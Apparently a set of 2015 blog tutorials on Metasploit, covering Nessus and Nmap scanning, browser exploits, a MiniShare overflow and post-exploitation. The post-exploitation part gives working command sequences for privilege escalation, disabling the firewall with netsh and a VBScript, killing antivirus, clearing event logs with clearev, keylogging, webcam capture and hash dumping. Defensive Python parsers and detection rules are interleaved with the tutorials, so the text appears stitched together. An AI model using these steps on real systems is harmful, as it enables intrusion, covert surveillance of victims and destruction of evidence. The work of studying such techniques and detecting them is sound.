Nessus and POST Exploitation in MetaSPLOIT

Friday, 15 May 2015

Nessus Basics

Nessus is a proprietary vulnerability scanner. It detects:
> vulnerabilities
> misconfigurations
> default credentials on the target system
> it is also used in various compliance audits

To open Nessus inside Metasploit
    msfconsole -> load nessus -> nessus_help

Connect to the Nessus server on our localhost to start the scans
syntax
    nessus_connect <your username>:<your password>@localhost:8834 <ok>
Example
    nessus_connect prasoonnigam:hacker09@localhost:8834 ok
8834 is the default Nessus port

Check the Nessus scanning policies

Syntax
    nessus_policy_list

Four policies of Nessus
1) External network scan -> used for scanning network vulnerabilities from outside the network
2) Internal network scan -> used for scanning network vulnerabilities from inside the network
3) Web App Tests -> used for scanning web applications for vulnerabilities
4) PCI-DSS (Payment Card Industry Data Security Standard) audits -> used in the payment card industry as the data security standard

Scanning the victim machine

> create a new scan
syntax
    nessus_scan_new <policy ID> <scan name> <target ip>
example
    nessus_scan_new -2 windowsscan 192.168.3.2
> check the status
    nessus_scan_status
> check the report list
    nessus_report_list
> open the report
    nessus_report_hosts <report ID>
    example : nessus_report_hosts dgfwef82nd8934y89hg9rety389
>> the severity columns give you the total number of vulnerabilities per host

Classifications of the different vulnerabilities

> Sev 0 indicates high level vulnerabilities
> Sev 1 indicates medium level vulnerabilities
> Sev 2 indicates low-level vulnerabilities
> Sev 3 indicates informational vulnerabilities

Command to see all the vulnerabilities of a host, listed by port

    nessus_report_hosts_ports <target IP> <report id>
    example : nessus_report_hosts_ports 192.168.11.164 asjfh398fdbf5t705tdb4t9
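The per-host totals that nessus_report_hosts and nessus_report_hosts_ports print can be reproduced straight from the .nessus file, which is handy for triage before anyone opens msfconsole. The parser below is an added example, not code from the post or from Metasploit; it assumes the .nessus v2 layout (Report/ReportHost/ReportItem), in which the file's own severity attribute runs from 0 (informational) to 4 (critical), and the sample report embedded in it is constructed.

```python
"""Summarise a Nessus report (.nessus v2 XML) per host and per severity."""
import xml.etree.ElementTree as ET
from collections import Counter, defaultdict

# Constructed sample report: the hosts, plugin IDs and plugin names are made up
# for this example and are not output of a real scan.
SAMPLE_NESSUS = """<?xml version="1.0" ?>
<NessusClientData_v2>
  <Report name="windowsscan">
    <ReportHost name="192.168.11.164">
      <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="4"
                  pluginID="100001" pluginName="Constructed: SMB remote code execution"/>
      <ReportItem port="3389" svc_name="msrdp" protocol="tcp" severity="2"
                  pluginID="100002" pluginName="Constructed: RDP weak configuration"/>
      <ReportItem port="0" svc_name="general" protocol="tcp" severity="0"
                  pluginID="100003" pluginName="Constructed: OS identification"/>
    </ReportHost>
    <ReportHost name="192.168.11.23">
      <ReportItem port="80" svc_name="www" protocol="tcp" severity="1"
                  pluginID="100004" pluginName="Constructed: HTTP server version disclosed"/>
    </ReportHost>
  </Report>
</NessusClientData_v2>
"""

# Scale used by the severity attribute inside the .nessus file itself.
SEVERITY_NAMES = {0: "Info", 1: "Low", 2: "Medium", 3: "High", 4: "Critical"}


def parse_nessus(xml_text):
    """Return {host: [finding, ...]} with one dict per ReportItem."""
    root = ET.fromstring(xml_text)
    findings = defaultdict(list)
    for host in root.iter("ReportHost"):
        for item in host.findall("ReportItem"):
            findings[host.get("name")].append({
                "port": int(item.get("port", "0")),
                "protocol": item.get("protocol", ""),
                "service": item.get("svc_name", ""),
                "severity": int(item.get("severity", "0")),
                "plugin_id": item.get("pluginID", ""),
                "plugin_name": item.get("pluginName", ""),
            })
    return dict(findings)


def severity_summary(findings):
    """{host: {severity: count}}: the totals behind the Sev columns of nessus_report_hosts."""
    return {host: dict(Counter(f["severity"] for f in items))
            for host, items in findings.items()}


def hosts_needing_attention(findings, min_severity=3):
    """Hosts with at least one finding at or above min_severity, worst first."""
    ranked = []
    for host, items in findings.items():
        worst = max((f["severity"] for f in items), default=0)
        if worst >= min_severity:
            ranked.append((host, worst))
    ranked.sort(key=lambda pair: (-pair[1], pair[0]))
    return ranked


def port_summary(findings, host):
    """Worst severity per (port, protocol, service) on one host, which is the
    view nessus_report_hosts_ports <ip> <report id> gives."""
    worst = {}
    for f in findings.get(host, []):
        key = (f["port"], f["protocol"], f["service"])
        worst[key] = max(worst.get(key, 0), f["severity"])
    return worst


if __name__ == "__main__":
    report = parse_nessus(SAMPLE_NESSUS)
    for host, counts in severity_summary(report).items():
        cells = ", ".join("%s=%d" % (SEVERITY_NAMES[s], n) for s, n in sorted(counts.items()))
        print(host, cells)
    print("attention:", hosts_needing_attention(report))
```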

Report Importing in Metasploit

> Importing an Nmap report into the PostgreSQL database via msfconsole
    scan any host and save the Nmap report in XML format

>> Check the database connectivity of msfconsole
    syntax : db_status

> import the Nmap report
    syntax: db_import <report path with file name>
    example: db_import /root/Desktop/scan.xml

>> see the host details
    syntax: hosts <ip of the host on which the nmap scan was performed>
    Example: hosts 192.168.11.23
you will get to know the OS and MAC address

>> check the open ports and the services running on those ports
    syntax: services <ip>
    example: services 192.168.0.102
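What db_import stores, and what the hosts and services commands then print, is just a flattening of the Nmap XML written with -oX. The parser below is an added example, not code from the post or from Metasploit; it assumes the standard nmaprun layout (host/address, host/ports/port/state, host/ports/port/service, host/os/osmatch) and runs on a constructed sample report.

```python
"""Parse an Nmap -oX report into host and service tables like those db_import builds."""
import xml.etree.ElementTree as ET

# Constructed sample in the nmaprun XML format; not output from a real scan.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sS -O -oX scan.xml 192.168.11.23 192.168.0.102">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.168.11.23" addrtype="ipv4"/>
    <address addr="00:11:22:33:44:55" addrtype="mac" vendor="Constructed"/>
    <ports>
      <port protocol="tcp" portid="135"><state state="open" reason="syn-ack"/>
        <service name="msrpc" product="Microsoft Windows RPC" method="probed" conf="10"/></port>
      <port protocol="tcp" portid="445"><state state="open" reason="syn-ack"/>
        <service name="microsoft-ds" method="table" conf="3"/></port>
      <port protocol="tcp" portid="3389"><state state="filtered" reason="no-response"/>
        <service name="ms-wbt-server" method="table" conf="3"/></port>
    </ports>
    <os><osmatch name="Microsoft Windows XP SP2" accuracy="97"/></os>
  </host>
  <host>
    <status state="up" reason="echo-reply"/>
    <address addr="192.168.0.102" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="5.3p1" method="probed" conf="10"/></port>
      <port protocol="udp" portid="161"><state state="open|filtered" reason="no-response"/>
        <service name="snmp" method="table" conf="3"/></port>
    </ports>
  </host>
  <host>
    <status state="down" reason="no-response"/>
    <address addr="192.168.0.103" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return one dict per host that was up: ip, mac, os, ports[]."""
    root = ET.fromstring(xml_text)
    hosts = []
    for h in root.findall("host"):
        status = h.find("status")
        if status is None or status.get("state") != "up":
            continue                      # down hosts carry no port data
        entry = {"ip": None, "mac": None, "os": None, "ports": []}
        for addr in h.findall("address"):
            if addr.get("addrtype") in ("ipv4", "ipv6"):
                entry["ip"] = addr.get("addr")
            elif addr.get("addrtype") == "mac":
                entry["mac"] = addr.get("addr")
        match = h.find("os/osmatch")      # first (best) OS guess, if -O was used
        if match is not None:
            entry["os"] = match.get("name")
        for p in h.findall("ports/port"):
            state = p.find("state")
            svc = p.find("service")
            product = ""
            if svc is not None:
                product = " ".join(v for v in (svc.get("product"), svc.get("version")) if v)
            entry["ports"].append({
                "port": int(p.get("portid")),
                "proto": p.get("protocol"),
                "state": state.get("state") if state is not None else "unknown",
                "service": svc.get("name", "") if svc is not None else "",
                "product": product,
            })
        hosts.append(entry)
    return hosts


def hosts_table(hosts):
    """Rows like the msfconsole 'hosts' listing: (ip, mac, os)."""
    return [(h["ip"], h["mac"] or "", h["os"] or "") for h in hosts]


def services_table(hosts, ip=None, state="open"):
    """Rows like 'services <ip>': (ip, port, proto, service, product) for ports in
    the given state. UDP ports often report "open|filtered", so pass that state
    explicitly to see them; they are not "open"."""
    rows = []
    for h in hosts:
        if ip is not None and h["ip"] != ip:
            continue
        for p in h["ports"]:
            if p["state"] == state:
                rows.append((h["ip"], p["port"], p["proto"], p["service"], p["product"]))
    return rows


if __name__ == "__main__":
    parsed = parse_nmap_xml(SAMPLE_NMAP_XML)
    for row in hosts_table(parsed):
        print("host    ", row)
    for row in services_table(parsed):
        print("service ", row)
```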

> Importing the Nessus report into msfconsole
    syntax: db_import <report path with file name>
    example: db_import /root/Desktop/Nessus_scan.nessus

> check the vulnerabilities
    syntax: vulns <ip (hostname)>
    example: vulns 192.168.22.16


Client Side Exploitation

What are Client Side Attacks?

> The server is the main computer that shares its resources over the network, and the clients are the other computers on the network that use these resources.

> There is a large array of attacks that may be launched against the clients, such as
> browser-based attacks
> vulnerable service exploitation
> attacks on the many applications of a client OS, such as PDF readers, document readers and instant messengers

> The malicious code may exploit any form of ActiveX, Java and Flash in the browser

Exploits of the victim's browser

> browser autopwn
    msfconsole -> use auxiliary/server/browser_autopwn -> show options -> set LHOST 192.168.2.23 (required field that has to be filled) -> set SRVHOST 192.168.3.22 (SRVHOST is the local machine address the server listens on) -> set SRVPORT 80 (SRVPORT is the local port) -> run

after typing run it starts the exploit modules on the localhost and also provides the malicious URL, which must be delivered to the victim and clicked

    -> to check the meterpreter session that was created, type "sessions"

(getting into the computer and interacting with the session)
-> sessions (shows the ID) -> sessions -i <id> -> sysinfo

> Internet Explorer Shortcut Icon Exploit
    shortcut icons that contain a malicious DLL

    msfconsole -> use exploit/windows/browser/ms10_046_shortcut_icon_dllloader -> show options -> set SRVHOST 192.168.2.3 -> set SRVPORT 80 -> set URIPATH / -> exploit -> sessions -> sessions -i 1

> Internet Explorer malicious VBScript code execution exploit

    msfconsole -> use exploit/windows/browser/ms10_022_ie_vbscript_winhlp32 -> show options -> set SRVHOST 192.168.11.105 -> set SRVPORT 80 -> set URIPATH / -> exploit -> send the URL
after F1 is pressed the malicious VBScript runs in the browser and delivers a payload named calc.exe -> sessions -> sessions -i 1


                      POST Exploitation


    Post exploitation basically means the phases of operation once a victim's system has been compromised by the attacker. The value of the compromised system is determined by the value of the actual data stored in it and how an attacker may make use of it for malicious purposes.
    The concept of post exploitation has risen from this fact only: how you can use the victim's compromised system's information, document it, and have an idea of the configuration channels.

Phases of post exploitation
> Understanding the victim
> Privilege escalation
> Cleaning tracks and staying undetected
> Collecting system information and data
> Setting up backdoors and rootkits
> Pivoting to penetrate internal networks

Let's start the first phase of post exploitation by gathering as much information as possible

Type in :
    sysinfo (get system info)
    getpid (get the process ID)
    ps (get the process list)
    run checkvm (check whether the victim's system is a virtual machine or not)
    idletime (check whether the victim is active or not)
    run get_env (the victim's system environment, via another meterpreter script)
    ipconfig (check the victim's system IP address)
    route (see the full network settings)
    run getcountermeasure (map the security configuration of the victim's system)
    run getgui (enable the victim's Remote Desktop Protocol service)
    run getgui -e
    run gettelnet (enable the telnet service)
    run gettelnet -e
    run get_local_subnets (see the victim's local subnets)
    run hostedit (allows an attacker to add host entries in the Windows hosts file)
    run hostedit -e 127.0.0.1 www.apple.com
    run enum_logged_on_users (how many users are currently logged in)
    run enum_logged_on_users -c
    run get_application_list (shows all the installed applications)
    run windows/gather/forensics/enum_drives (gather the physical drives)
    run windows/gather/enum_ms_product_keys (get the OS product key)
    run windows/gather/credentials/windows_autologin (check the autologin feature)
    run winenum (dump some juicy information such as hashes and tokens)
    cd /root/.msf4/logs/scripts/winenum/Exploit-0FE265D 2013027.2532 -> ls
    cat hashdump.txt
    run scraper
    .msf4/logs/scripts/scraper/192.168.0.104_201330 -> cat services.txt


Post Exploitation: Privilege Escalation

> Post exploitation is divided into five phases

Understanding Privilege Escalation
    Privilege escalation, in simple terms, is gaining elevated privileges to resources that are normally protected and whose access is denied to normal or unauthorized users.
Example:- Things we can do after privilege escalation are installing malicious software for unethical uses
> deleting user files
> denying resources to a particular user
> viewing private information

Divided into two major forms :-
> Vertical Privilege Escalation
> Horizontal Privilege Escalation

Vertical Privilege Escalation
    a lower privileged user or application may access functions that are reserved only for authorized or administrative users. This is also known as privilege elevation.

Horizontal Privilege Escalation
    This escalation happens on a horizontal scale with respect to user rights: a normal user accesses the resources reserved for another user.

Exploiting the victim's system
> we use a piece of software called MiniShare (free file sharing software)

Commands
    open msfconsole -> use exploit/windows/http/minishare_get_overflow -> show options -> set RHOST 192.168.11.203 (victim ip) -> set RPORT 80 -> show targets -> set TARGET 3 (choose the option) -> exploit ->

(Meterpreter) getuid -> getsystem -h -> getsystem -t 0 -> ps


Privilege escalation by post exploitation
    The module uses the built-in getsystem command to escalate the current session to the SYSTEM account from an administrator user account.

(Meterpreter)     run post/windows/escalate/getsystem

        run post/windows/escalate/service_permissions
(The module exploits the existing administrative privileges to obtain a SYSTEM session. If it fails in the first instance, the module inspects the existing services and looks for insecure file permissions that are vulnerable to an attack)

Different exploit for compromising the target system
    msf> use exploit/windows/browser/ms10_002_aurora -> show options -> set SRVHOST 192.168.0.109 (Victim IP) ->  exploit -> sessions -> sessions -i 1


Post Exploitation: Cleaning Up Traces
    Cleaning tracks and traces through log deletion, and staying undetected by disabling the firewall and antivirus systems

Why is a firewall important?
A firewall is basically software or hardware that blocks unauthorized entry to a system or a network. A firewall also keeps track of intrusions and security breaches. If the firewall is well configured, each unauthorized entry is blocked and logged in the security logs. It controls the incoming and outgoing network traffic and analyzes the data packets.
It decides whether it should allow the packet through the firewall or not.

Firewalls are classified into three different types:
> Packet Filter Firewall
> Stateful Firewall
> Application Firewall

Packet Filter Firewall
    These firewalls are associated with the first three layers of the OSI model, with a little help from the transport layer as well for the source and destination port numbers. When a packet travels towards the packet filter firewall, it is analyzed against a set of rules.

Stateful Firewall
    These are also called second-generation firewalls. They work on the states of a network connection. Based on the state, the firewall determines whether to allow the packet into the network or not.

Application Firewall
    These are known as third-generation firewalls. Application firewalls work on applications and protocols like HTTP, SMTP and SSH. They also help in detecting whether an unwanted protocol is trying to bypass the firewall on an allowed port.

commands
    run getcountermeasure
        operational mode         = Enable

        -> shell -> netsh firewall show opmode
see whether the firewall is enabled or not
        -> shell -> netsh firewall set opmode mode=disable

Disabling firewalls through VBScript

    Code
        Set objFirewall = CreateObject("HNetCfg.FwMgr")
        Set objPolicy = objFirewall.LocalPolicy.CurrentProfile
        objPolicy.FirewallEnabled = FALSE
save the code with a .vbs extension

syntax        upload <source filepath> <destination filepath>
Example        upload /root/Desktop/disable.vbs C:\

    Go to the destination and execute it


Antivirus Killing and Log Deletion

killing the processes of an antivirus with the help of a post exploitation Meterpreter script known as killav

Script of killav.rb
        /opt/framework/msf3/scripts/killav.rb

the name of the antivirus must be present in killav.rb; only then will the antivirus be stopped

(Meterpreter) run killav -> tasklist (to see the task manager processes) or tasklist /svc or tasklist /svc | find /I "avg"

> To see the properties of the processes that are running
        sc queryex avgwd -> sc config <service name> start= disabled (disables a process that cannot be killed)
Terminating a process
    taskkill /F /IM "antivirus name*"


Clearing tracks to be SAFE

Clearing all the logs
 (Meterpreter) clearev
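Every step in this clean-up section leaves a trace on a host whose auditing is on: the netsh, sc and taskkill commands appear in process-creation events (4688 with command-line auditing, or Sysmon event 1), a firewall change raises 4950/5025 in the Security log, and clearev produces 1102 (Security log cleared) and 104 (System/Application cleared). The detection logic below is an added example, not code from the post; the flattened event layout and the sample records are constructed.

```python
"""Flag the clean-up tradecraft of this section in Windows event records."""
import re

# Constructed sample events (not from a real host), flattened the way a SIEM
# would hold them; the command lines mirror the commands in this section.
SAMPLE_EVENTS = [
    {"id": 1, "event_id": 4688, "channel": "Security", "command_line": "netsh firewall show opmode"},
    {"id": 2, "event_id": 4688, "channel": "Security", "command_line": "netsh firewall set opmode mode=disable"},
    {"id": 3, "event_id": 4950, "channel": "Security", "command_line": ""},
    {"id": 4, "event_id": 4688, "channel": "Security", "command_line": "sc config avgwd start= disabled"},
    {"id": 5, "event_id": 4688, "channel": "Security", "command_line": 'taskkill /F /IM "avg*"'},
    {"id": 6, "event_id": 4688, "channel": "Security", "command_line": "tasklist /svc"},
    {"id": 7, "event_id": 1102, "channel": "Security", "command_line": ""},
    {"id": 8, "event_id": 104, "channel": "System", "command_line": ""},
]

# Events that carry a process command line: 4688 (Security, with command-line
# auditing enabled) and Sysmon event 1.
PROCESS_EVENTS = {(4688, "Security"), (1, "Microsoft-Windows-Sysmon/Operational")}

# Events that are interesting on their own, without a command line.
LOG_RULES = {
    (1102, "Security"): "Security event log cleared",
    (104, "System"): "event log cleared",
    (4950, "Security"): "Windows Firewall setting changed",
    (5025, "Security"): "Windows Firewall service stopped",
}

COMMAND_RULES = [
    ("firewall disabled via netsh",
     re.compile(r"\bnetsh\s+(advfirewall|firewall)\s+set\b.*(mode\s*=\s*disable|state\s+off)", re.I)),
    ("service start type set to disabled via sc",
     re.compile(r"\bsc(\.exe)?\s+config\s+\S+\s+start=\s*disabled\b", re.I)),
    ("forced process kill via taskkill",
     re.compile(r"\btaskkill(\.exe)?\b(?=.*\s/f\b)(?=.*\s/im\s)", re.I)),
]

TAMPER = {"firewall disabled via netsh", "service start type set to disabled via sc",
          "forced process kill via taskkill", "Windows Firewall setting changed",
          "Windows Firewall service stopped"}
LOG_CLEAR = {"Security event log cleared", "event log cleared"}


def match_event(event):
    """Return the rule names one event triggers (possibly none)."""
    key = (event["event_id"], event["channel"])
    hits = []
    if key in LOG_RULES:
        hits.append(LOG_RULES[key])
    if key in PROCESS_EVENTS:
        for name, pattern in COMMAND_RULES:
            if pattern.search(event.get("command_line", "")):
                hits.append(name)
    return hits


def detect(events):
    """[(event id, rule name)] for every event that triggers a rule."""
    return [(ev["id"], name) for ev in events for name in match_event(ev)]


def cleanup_pattern(alerts):
    """True when one batch shows both defence tampering and a log wipe, i.e. the
    disable-protections-then-clearev combination this section describes."""
    names = {name for _id, name in alerts}
    return bool(names & TAMPER) and bool(names & LOG_CLEAR)


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for event_id, name in found:
        print("event %d: %s" % (event_id, name))
    print("clean-up pattern:", cleanup_pattern(found))
```

The read-only commands in the sample (netsh firewall show opmode, tasklist /svc) are deliberately not flagged; they are what an administrator runs too.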

NMAP in METASPLOIT

Saturday, 2 May 2015

NMAP (Network Mapper)
using nmap in metasploit

> Nmap is a powerful security scanner developed by Gordon Lyon




How does nmap work?

> Whenever Nmap performs a scan, it delivers an ICMP echo request to the destination to check whether the host is alive or dead. This process saves Nmap much time when it scans multiple hosts at a time. Sometimes ICMP requests are blocked by firewalls, so as a secondary check nmap tries to connect to default open ports such as 80 and 443, which are used by web servers (HTTP).

Working with NMAP in Metasploit

Nmap is used for
> host discovery
> service detection
> open port detection on a computer network

Nmap has many features
> stealth scan
> aggressive scan
> firewall evasion scan
> the ability to fingerprint the operating system
>>>>> Nmap has its own Nmap Scripting Engine -> its scripts are written in the Lua programming language

Nmap scanning using Metasploit
Nmap with no options performs a basic scan of the target address

syntax
    nmap <target ip_address>
    nmap 192.168.11.29

Scan multiple targets
syntax
    nmap <target> <target>
    nmap 192.168.11.46 192.168.11.29

Scan a list of targets
    >> just separate all targets by a new line or a space
        for example
            192.168.11.29
            192.168.11.86
            192.168.11.36 and so on

syntax
    nmap -iL <list.txt>
    nmap -iL /root/Desktop/list.txt

Nmap Options
> Nmap command options
© Prasoon Nigam
Feature                                 Option
> Don't ping                            -Pn
> Perform a Ping Only Scan              -sP
> TCP SYN Ping                          -PS
> TCP ACK Ping                          -PA
> UDP Ping                              -PU
> SCTP INIT Ping                        -PY
> ICMP Timestamp Ping                   -PP
> ICMP Echo Ping                        -PE
> ICMP Address Mask Ping                -PM
> IP Protocol Ping                      -PO
> ARP Ping                              -PR
> Traceroute                            --traceroute
> Force Reverse DNS Resolution          -R
> Disable Reverse DNS Resolution        -n
> Alternative DNS Lookup                --system-dns
> Manually Specified DNS Server(s)      --dns-servers
> Create a Host List                    -sL

Examples
> nmap -sP 192.168.11.60  (Ping only scan)
> nmap -PA 192.168.11.46  (TCP ACK Ping)
> nmap -PE 192.168.11.44  (ICMP echo ping)
> nmap -R 66.147.244.90   (Force reverse DNS resolution)


NMAP advanced scanning options

Feature                                 Option
> TCP SYN Scan                          -sS
> TCP Connect Scan                      -sT
> UDP Scan                              -sU
> TCP Null Scan                         -sN
> TCP FIN Scan                          -sF
> Xmas Scan                             -sX
> TCP ACK Scan                          -sA
> Custom TCP Scan                       --scanflags
> IP Protocol Scan                      -sO
> Send Raw Ethernet Packets             --send-eth
> Send IP Packets                       --send-ip

Flag                 Usage
> SYN                Synchronize
> ACK                Acknowledgement
> PSH                Push
> URG                Urgent
> RST                Reset
> FIN                Finished


Examples
> nmap -sS 192.168.11.46 (TCP SYN scan) attempts to identify ports by sending a SYN packet to the target and waiting for a response. A SYN packet is basically sent to indicate that a new connection is to be established. This type is also known as the stealth scan.
> nmap -sN 192.168.2.33 (TCP null scan) sends packets with no TCP flags set. This is done by setting the flags field to zero, to fool a firewalled system into giving a response

Custom TCP Scan
> nmap --scanflags SYNURG 192.168.0.102
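The scan types above differ only in which TCP flag bits the probe carries, which is exactly what an IDS rule looks at: a real client never sends a packet with no flags, FIN alone, or FIN+PSH+URG, while a bare SYN is only suspicious when one source sprays it across many ports. The classifier below is an added example, not code from the post or from Nmap; it assumes the standard TCP flag bit values and Nmap's --scanflags spelling (names run together, comma-separated, or a number), and the packet summaries it scores are constructed.

```python
"""Classify TCP probes by flag bits and spot scan-like senders, as an IDS rule would."""
from collections import Counter, defaultdict

# Standard bit values of the six classic TCP flags (low byte of the flags field).
FLAG_BITS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08, "ACK": 0x10, "URG": 0x20}


def parse_scanflags(spec):
    """Turn an nmap-style spec ("SYNURG", "FIN,PSH,URG", "0x29" or "41") into a bitmask."""
    spec = spec.strip().upper().replace(",", "")
    if spec.startswith("0X"):
        return int(spec, 16) & 0x3F
    if spec.isdigit():
        return int(spec) & 0x3F
    mask = 0
    for i in range(0, len(spec), 3):          # every flag name is three letters
        name = spec[i:i + 3]
        if name not in FLAG_BITS:
            raise ValueError("unknown TCP flag %r in %r" % (name, spec))
        mask |= FLAG_BITS[name]
    return mask


def flag_names(mask):
    return [name for name, bit in FLAG_BITS.items() if mask & bit]


def classify_probe(mask):
    """Name the scan type a lone packet with these flags corresponds to."""
    mask &= 0x3F
    if mask == 0:
        return "NULL scan"
    if mask == FLAG_BITS["FIN"]:
        return "FIN scan"
    if mask == FLAG_BITS["FIN"] | FLAG_BITS["PSH"] | FLAG_BITS["URG"]:
        return "Xmas scan"
    if mask == FLAG_BITS["SYN"]:
        return "SYN (connect or SYN scan)"
    if mask == FLAG_BITS["ACK"]:
        return "ACK scan"                    # also plain data-flow ACKs; see below
    if mask & FLAG_BITS["SYN"] and mask & FLAG_BITS["ACK"]:
        return "SYN/ACK (handshake reply)"
    return "custom flags " + "|".join(flag_names(mask))


# Constructed packet summaries: (source, destination, destination port, flag bits).
SAMPLE_PACKETS = [
    ("10.0.0.5", "192.168.11.29", 443, 0x02),      # ordinary client opening one connection
    ("10.0.0.5", "192.168.11.29", 443, 0x10),      # ACK inside that established flow
    ("192.168.11.46", "192.168.11.29", 21, 0x02),  # bare SYNs to several ports
    ("192.168.11.46", "192.168.11.29", 22, 0x02),
    ("192.168.11.46", "192.168.11.29", 80, 0x02),
    ("192.168.11.46", "192.168.11.29", 445, 0x02),
    ("192.168.2.33", "192.168.11.29", 80, 0x00),   # no flags at all
    ("192.168.2.33", "192.168.11.29", 135, 0x00),
    ("192.168.0.102", "192.168.11.29", 80, parse_scanflags("SYNURG")),
    ("192.168.3.88", "192.168.11.29", 22, 0x29),   # FIN|PSH|URG
]

ANOMALOUS = {"NULL scan", "FIN scan", "Xmas scan"}


def suspicious_sources(packets, min_ports=3):
    """Per source: count probes no normal client sends (NULL, FIN, Xmas, custom)
    and the distinct ports hit with bare SYNs. A lone ACK is not counted, since
    every established flow carries them. Returns only sources worth a look."""
    anomalous = Counter()
    kinds = defaultdict(set)
    syn_ports = defaultdict(set)
    for src, _dst, dport, flags in packets:
        kind = classify_probe(flags)
        if kind.startswith("SYN ("):
            syn_ports[src].add(dport)
        elif kind in ANOMALOUS or kind.startswith("custom"):
            anomalous[src] += 1
            kinds[src].add(kind)
    result = {}
    for src in set(anomalous) | set(syn_ports):
        if anomalous[src] or len(syn_ports[src]) >= min_ports:
            result[src] = {"anomalous": anomalous[src],
                           "syn_ports": len(syn_ports[src]),
                           "kinds": sorted(kinds[src])}
    return result


if __name__ == "__main__":
    for src, info in sorted(suspicious_sources(SAMPLE_PACKETS).items()):
        print(src, info)
```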

Port scanning options
Feature                                 Option
> Perform a Fast Scan                   -F
> Scan Specific Ports                   -p <port>
> Scan Ports by Name                    -p <name>
> Scan Ports by Protocol                -p U:<UDP ports>,T:<TCP ports>
> Scan All Ports                        -p "*"
> Scan Top Ports                        --top-ports
> Perform a Sequential Port Scan        -r

Examples
> nmap -F 192.168.11.46 (Fast scan)
> nmap -p http 192.168.3.8 (scan port by name)
> nmap -r 192.168.3.88 (sequential port scan) (useful for evading firewalls and intrusion prevention systems)

Nmap has some features that help to bypass these protection mechanisms as well

Feature                                 Option
> Fragment Packets                      -f
> Specify a Specific MTU                --mtu
> Use a Decoy                           -D
> Idle Zombie Scan                      -sI
> Manually Specify a Source Port        --source-port
> Append Random Data                    --data-length
> Randomize Target Scan Order           --randomize-hosts
> Spoof MAC Address                     --spoof-mac
> Send Bad Checksums                    --badsum

Examples
> nmap -f 192.168.12.88 (fragment packets) Nmap sends very small 8-byte packets, useful for evading an improperly configured firewall system

> nmap -sI 192.168.3.88 192.168.11.56 (Idle zombie scan) a very unique scanning technique in which Nmap uses a zombie host to scan the target; here two IP addresses are used, the zombie first and then the target

Spoof MAC Address
This technique is useful when a firewalled system detects a scanning process via the scanner's MAC address and blacklists that MAC address
MAC addresses can be spoofed via three different arguments

Argument                      Function
0 (zero)                      Generates a random MAC address
Specific MAC address          Uses the specified MAC address
Vendor name                   Generates a MAC address from the specified vendor
                              (such as Apple, Dell, HP etc)

syntax
nmap -sT -Pn --spoof-mac Apple 192.168.11.29

Save Nmap output results
Feature                                 Option
Save Output to a Text File              -oN
Save Output to an XML File              -oX
Grepable Output                         -oG
Output All Supported File Types         -oA
Periodically Display Statistics         --stats-every
l33t Output                             -oS

syntax
nmap -oX <scan.xml> <target>

example
nmap -oN scan.txt 192.168.11.46

METERPRETER BASICS


                                               METERPRETER Basics

After you get a session with the help of Metasploit, here are the basics of how to use Meterpreter

HERE's THE SECRET


Meterpreter is one of the spearheads in the Metasploit framework.
It is used as a payload post exploitation of a vulnerable system.
It uses in-memory DLL injection stagers and is extended over the network at runtime.
In-memory DLL injection is a technique used for injecting code into the address space of a currently running process by forcing it to load a DLL (Dynamic-Link Library) file

The single payload is very effective with its multiple capabilities
> helps in acquiring password hashes of a victim machine
> running a keylogger and
> privilege escalation.

The stealth feature makes it undetectable to many antivirus and host-based intrusion detection systems
Meterpreter also has the capability to switch between different processes to which it gets attached through DLL injection, and it stays by clinging to a running application on the compromised host rather than creating a new process on the system

Classified commands

> Command type
> Command name
> Description

Commands
Process listing

> getuid -> It gets the system ID & the name of the computer
> kill -> It terminates a process
> ps -> It lists the running processes
> getpid -> It gets the current process identifier

Keylog Usage
> keyscan_start -> It starts the keylogging session
> keyscan_stop -> It stops the keylogging session
> keyscan_dump -> It dumps the keystrokes captured from the victim machine

Session
> enumdesktops -> It lists all of the accessible desktops and workstations
> getdesktop -> It gets the current Meterpreter desktop
> setdesktop -> It changes the Meterpreter's current desktop

Sniffer Functions
> use sniffer -> It loads the sniffer functions
> sniffer_start -> It starts the sniffer for the interface
> sniffer_dump -> It dumps the network capture of the victim machine locally
> sniffer_stop -> It stops the sniffer for the interface

Webcam Commands
> webcam_list -> It lists all of the webcams of the system
> webcam_snap -> It captures a snapshot from the victim machine's webcam
> record_mic -> It records the sound of the environment from the default microphone on the machine

> sysinfo -> to check the system information
> screenshot -> capture a screenshot of the victim machine
> ps -> will show the running processes

*> migrate <pid> :: example migrate 1512 (explorer.exe) -> getpid -> keyscan_start (wait a few minutes to capture the keystrokes of the victim machine) -> keyscan_dump -> keyscan_stop (to dump the keystrokes and stop the keylogger)

*> webcam_snap (you get the snapshot from the webcam)

*> shell (to get the command shell of the victim) -> mkdir <directory name> (creating a directory) (shell is the cmd of the victim computer)


Vulnerability scanning and Information Gathering

:> Information Gathering Through Metasploit
Information gathering is the process of collecting information about a victim using various techniques.
Divided into two steps
> Footprinting
> Scanning

The Metasploit auxiliary modules have various scans, from ARP to SYN
service-based scans
> HTTP
> SMB
> SQL
> SSH

Methods for Information Gathering


>> whois
         It is widely used for querying databases that store the registered users of an Internet resource

type in msfconsole
   whois <domain name>
example whois hackingrtz.com

To get e-mail addresses we use e-mail harvesting
>  E-mail harvesting is a very useful tool to get the e-mail IDs associated with a particular domain

syntax
 use auxiliary/gather/search_email_collector -> show options -> set DOMAIN <domain name> -> run
for example :- set DOMAIN hackingartz.com

Active Information Gathering

a useful auxiliary scanner is the telnet version scanner

syntax
  use auxiliary/scanner/telnet/telnet_version -> show options -> see that the RHOSTS field is empty

syntax
   set RHOSTS <target ip address>
   for example :-  set RHOSTS 192.168.0.103 -> run

To find whether a Remote Desktop connection (RDP) is available, use the RDP scanner
To know the RDP port number

Syntax : type in
     use auxiliary/scanner/rdp/ms12_020_check -> show options
after setting the port we set RHOSTS

syntax
    set RPORT <port no.> -> set RPORT 3389
    set RHOSTS <ip address> -> set RHOSTS 192.168.11.46
when done with all the options type run

MetaSPLOIT BASICS

Friday, 1 May 2015


                           METASPLOIT

